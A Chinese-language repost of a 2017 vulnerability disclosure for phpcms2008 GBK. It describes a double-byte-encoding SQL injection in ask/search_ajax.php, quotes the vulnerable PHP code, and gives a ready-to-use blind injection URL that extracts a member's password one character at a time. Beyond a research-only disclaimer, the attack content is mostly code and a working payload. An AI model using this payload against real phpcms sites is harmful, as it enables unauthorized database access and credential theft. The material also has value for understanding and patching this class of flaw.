phpcms2008 GBK 双字节编码 0day ask/search_ajax.php 's

admin
admin
admin
138858
文章
114
评论
2017年5月8日03:50:29评论580 views字数 1014阅读3分22秒阅读模式
摘要

作者:幻泉[B.S.N]受影响程序: phpcms2008 gbk漏洞文件:ask/search_ajax.php
漏洞等级:高
漏洞说明:
/ask/search_ajax.php
Code:

作者:幻泉[B.S.N]

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php

漏洞等级:高
漏洞说明:
/ask/search_ajax.php
Code:

if($q) { $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where } else { exit('null'); } $infos = $ask->listinfo($where, 'askid DESC', '', 10);

/ask/include/answer.class.php
Code:

function listinfo($where = '', $order = '', $page = 1, $pagesize = 50) { if($where) $where = " WHERE $where"; if($order) $order = " ORDER BY $order"; $page = max(intval($page), 1); $offset = $pagesize*($page-1); $limit = " LIMIT $offset, $pagesize"; $r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where"); $number = $r['number']; $this->pages = pages($number, $page, $pagesize); $array = array(); $i = 1; $result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit"); while($r = $this->db->fetch_array($result)) { $r['orderid'] = $i; $array[] = $r; $i++; } $this->number = $this->db->num_rows($result); $this->db->free_result($result); return $array; }

测试方法:
/ask/search_ajax.php?q=s%D5’/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月8日03:50:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcms2008 GBK 双字节编码 0day ask/search_ajax.php 'shttps://cn-sec.com/archives/46246.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息